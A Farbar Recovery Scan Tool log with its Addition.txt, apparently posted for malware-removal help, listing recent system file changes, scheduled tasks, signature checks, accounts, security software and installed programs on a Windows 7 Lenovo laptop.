2016-10-15 15:28 - 2016-09-08 04:55 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-10-15 15:18 - 2016-07-22 04:58 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2016-10-15 15:18 - 2016-07-22 04:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2016-10-09 22:51 - 2016-09-12 11:17 - 00077032 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-10-09 22:51 - 2016-09-12 11:08 - 01226752 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 01629184 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00586752 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-10-09 22:11 - 2016-08-29 05:31 - 14183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-10-09 22:11 - 2016-08-29 05:31 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-10-09 22:11 - 2016-08-29 05:31 - 01867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-10-09 22:11 - 2016-08-29 05:12 - 12880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-10-09 22:11 - 2016-08-29 05:12 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-10-09 22:11 - 2016-08-29 05:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-10-09 22:11 - 2016-08-29 05:04 - 03229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-10-09 22:11 - 2016-08-29 04:55 - 02972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-10-09 22:11 - 2016-08-16 10:40 - 00343552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00327168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00007808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2016-10-09 22:11 - 2016-08-12 07:02 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-10-09 22:11 - 2016-08-12 07:02 - 12574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2016-10-09 22:11 - 2016-08-12 07:02 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2016-10-09 22:11 - 2016-08-12 07:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2016-10-09 22:11 - 2016-08-12 07:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2016-10-09 22:11 - 2016-08-12 06:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2016-10-09 22:11 - 2016-08-12 06:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-10-09 22:11 - 2016-08-12 06:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2016-10-09 22:11 - 2016-08-12 06:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2016-10-09 22:11 - 2016-08-12 06:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2016-10-09 22:11 - 2016-08-12 06:26 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 02023424 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll
2016-10-09 22:11 - 2016-08-06 05:01 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2016-10-09 22:11 - 2016-08-06 05:01 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2016-10-09 22:11 - 2016-08-06 04:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2016-10-09 22:11 - 2016-08-06 04:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe
2016-10-09 22:11 - 2016-08-06 04:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll
2016-10-09 22:11 - 2016-06-14 07:21 - 00094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2016-10-09 22:11 - 2016-06-14 07:16 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-10-09 22:11 - 2016-06-14 07:11 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2016-10-09 22:11 - 2016-06-14 05:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2016-10-09 22:11 - 2016-06-14 05:15 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-10-09 22:11 - 2016-06-14 05:15 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-10-09 22:11 - 2016-06-14 05:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-10-09 22:11 - 2016-06-14 05:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2016-10-09 22:11 - 2016-06-14 05:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2016-10-09 22:11 - 2016-06-14 05:00 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2016-10-09 22:11 - 2016-06-14 05:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2016-09-27 23:41 - 2016-09-28 00:49 - 00000000 ____D C:\Users\Wayne\Desktop\tabieats
2016-09-25 10:52 - 2016-09-25 10:52 - 00000259 _____ C:\Users\Wayne\Desktop\Directions for Archiving (Dubbing) From VHS Tape to DVD Disc - ArchivingCartDirections.pdf.URL
2016-09-25 10:50 - 2016-09-25 10:50 - 00000266 _____ C:\Users\Wayne\Desktop\How to convert video to DVD convert VHS to digital - How-To - PC Advisor.URL
2016-09-25 10:45 - 2016-09-25 10:45 - 00709731 _____ C:\Users\Wayne\Desktop\Converting VHS Tapes to DVD_ A First-Hand Experience _ explora.pdf
2016-09-25 10:40 - 2016-09-25 10:40 - 00000303 _____ C:\Users\Wayne\Desktop\Converting VHS Tapes to DVD A First-Hand Experience explora.URL
2016-09-25 10:40 - 2016-08-12 06:26 - 00464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2016-09-25 10:40 - 2016-08-12 06:26 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2016-09-25 10:40 - 2016-08-12 06:26 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2016-09-25 10:33 - 2016-08-16 07:36 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-09-25 10:33 - 2016-08-15 16:48 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-09-25 10:33 - 2016-08-06 05:31 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-09-25 10:33 - 2016-08-06 05:15 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-09-25 10:27 - 2016-09-25 10:27 - 00000383 _____ C:\Users\Wayne\Desktop\why does recording stop when copying vhs tape with many recording segments - Google Search.URL
2016-09-25 10:27 - 2016-09-25 10:27 - 00000243 _____ C:\Users\Wayne\Desktop\VHS to DVD Copy Keeps Stopping - Club Myce.URL

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-21 21:12 - 2011-11-11 17:49 - 00003488 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2016-10-21 21:12 - 2011-11-11 17:49 - 00003448 _____ C:\Windows\System32\Tasks\PCDEventLauncher
2016-10-21 21:12 - 2011-11-11 17:49 - 00000528 _____ C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2016-10-21 21:12 - 2011-11-11 17:49 - 00000466 _____ C:\Windows\Tasks\SystemToolsDailyTest.job
2016-10-21 21:10 - 2011-10-23 13:51 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-10-21 21:10 - 2011-10-23 13:51 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-10-21 21:08 - 2013-09-01 11:09 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-10-21 20:58 - 2009-07-13 18:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-10-21 20:58 - 2009-07-13 18:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-10-21 20:50 - 2009-07-13 19:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-10-20 23:29 - 2016-07-31 20:40 - 00000162 _____ C:\Users\Wayne\Desktop\Things You Should Know for a Floor Tile Installation Project - YouTube.URL
2016-10-20 22:45 - 2016-03-06 11:09 - 00000243 _____ C:\Users\Wayne\Desktop\lenovo x220 display port - Google Search.URL
2016-10-20 22:39 - 2013-03-30 18:24 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-10-20 22:22 - 2016-04-10 13:41 - 00000224 _____ C:\Users\Wayne\Desktop\Adobe - Flash Player.URL
2016-10-20 21:14 - 2014-12-29 11:18 - 00002206 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-10-20 20:52 - 2016-04-28 18:44 - 00000000 ____D C:\QUARANTINE
2016-10-20 20:41 - 2015-04-11 13:30 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-10-18 20:07 - 2009-07-13 19:13 - 00782510 _____ C:\Windows\system32\PerfStringBackup.INI
2016-10-18 20:07 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\inf
2016-10-15 16:43 - 2011-10-23 13:23 - 00000000 ____D C:\ProgramData\Lenovo
2016-10-15 16:34 - 2016-07-23 01:01 - 00000984 _____ C:\Users\Wayne\Desktop\PotPlayer 64 bit.lnk
2016-10-15 16:07 - 2013-09-01 11:42 - 00000000 ____D C:\Windows\System32\Tasks\TVT
2016-10-15 16:06 - 2011-10-23 13:43 - 00000000 ___HD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo ThinkVantage Tools
2016-10-15 16:06 - 2011-10-23 13:42 - 00000000 ____D C:\Program Files (x86)\Lenovo
2016-10-15 15:53 - 2013-03-30 17:55 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-10-15 15:53 - 2013-03-30 17:55 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-10-15 15:53 - 2009-07-13 18:45 - 00408216 _____ C:\Windows\system32\FNTCACHE.DAT
2016-10-15 15:41 - 2013-09-01 10:57 - 00000000 ____D C:\Windows\system32\MRT
2016-10-15 15:32 - 2011-11-19 20:17 - 143495576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-10-15 15:31 - 2013-03-30 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-10-15 15:08 - 2014-09-20 21:04 - 00000000 ____D C:\Users\Wayne\AppData\Local\Adobe
2016-10-15 15:08 - 2013-09-01 11:09 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-10-15 15:07 - 2012-04-25 21:53 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-10-15 15:07 - 2011-11-19 20:14 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-10-15 15:07 - 2011-11-19 20:14 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-10-15 15:07 - 2011-11-19 20:14 - 00000000 ____D C:\Windows\system32\Macromed
2016-10-15 14:59 - 2013-10-10 21:12 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2016-10-15 14:58 - 2015-07-19 08:51 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-10-09 22:55 - 2014-12-29 10:58 - 00000000 ____D C:\Windows\system32\appraiser
2016-10-09 22:55 - 2014-05-24 17:12 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-10-09 22:35 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-10-09 22:35 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\system32\Dism
2016-10-09 22:20 - 2014-02-23 21:37 - 00775124 _____ C:\Windows\SysWOW64\PerfStringBackup.INI

==================== Files in the root of some directories =======

2014-07-09 13:01 - 2014-07-09 13:01 - 0022976 _____ (Intel Corporation) C:\Users\Wayne\AppData\Roaming\JomCap.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-05-12 20:50

==================== End of FRST.txt ============================

 

 

The contents of the Addition.txt file is:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (21-10-2016 22:03:45)
Running from C:\Users\Wayne\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2011-11-12 03:49:14)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3902107189-2783423906-2191778952-500 - Administrator - Disabled)
Guest (S-1-5-21-3902107189-2783423906-2191778952-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3902107189-2783423906-2191778952-1002 - Limited - Enabled)
Wayne (S-1-5-21-3902107189-2783423906-2191778952-1000 - Administrator - Enabled) => C:\Users\Wayne

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee VirusScan Enterprise (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee VirusScan Enterprise Antispyware Module (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 21.0.0.198 - Adobe Systems Incorporated)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.185 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.18) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.18 - Adobe Systems Incorporated)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)
Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)
Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)
Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version:  - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.2 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)
Conexant 20672 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.32.23.5 - Conexant)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Disable AMT Profile Synchronization Pop-up for Windows XP/Vista/7 (HKLM\...\DisableAMTPopup) (Version: 1.00 - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.71 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7619.1252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1011 - Intel Corporation)
Intel® Identity Protection Technology 1.2.32.0 (HKLM-x32\...\{2D793E41-F598-1014-9984-F3B169A93F79}) (Version: 1.2.32.0 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.1.80.1211 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Intel® Update Manager (x32 Version: 1.6.3.70 - Intel Corporation) Hidden
Intel® WiDi (HKLM\...\{F949AE30-83D1-41B2-92D2-F44478DD058A}) (Version: 4.2.24.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{a9888f41-68ae-43df-bd7d-d93405a44106}) (Version: 17.13.11 - Intel Corporation)
Java 7 Update 76 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217076FF}) (Version: 7.0.760 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 1.00 - )
Lenovo Patch Utility (HKLM-x32\...\{AD32F5E9-6BDD-480A-8B7B-95571D04691C}) (Version: 1.3.1.1 - Lenovo Group Limited)
Lenovo Patch Utility 64 bit (HKLM\...\{0369F866-2CE0-4EB9-B426-88FA122C6E82}) (Version: 1.3.0.9 - Lenovo Group Limited)
Lenovo Power Management Driver (Version: 1.67.12.16 - Lenovo) Hidden
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo Screen Reading Optimizer (HKLM-x32\...\{91A29166-4E1B-4664-B70B-4C4A3B6B3372}) (Version: 1.16 - Lenovo)
Lenovo Solution Center (HKLM\...\{AB46AC6D-3E9A-4484-8061-64FF10301B41}) (Version: 3.3.002.00 - Lenovo)
Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - )
Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.07.0037 - Lenovo)
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)
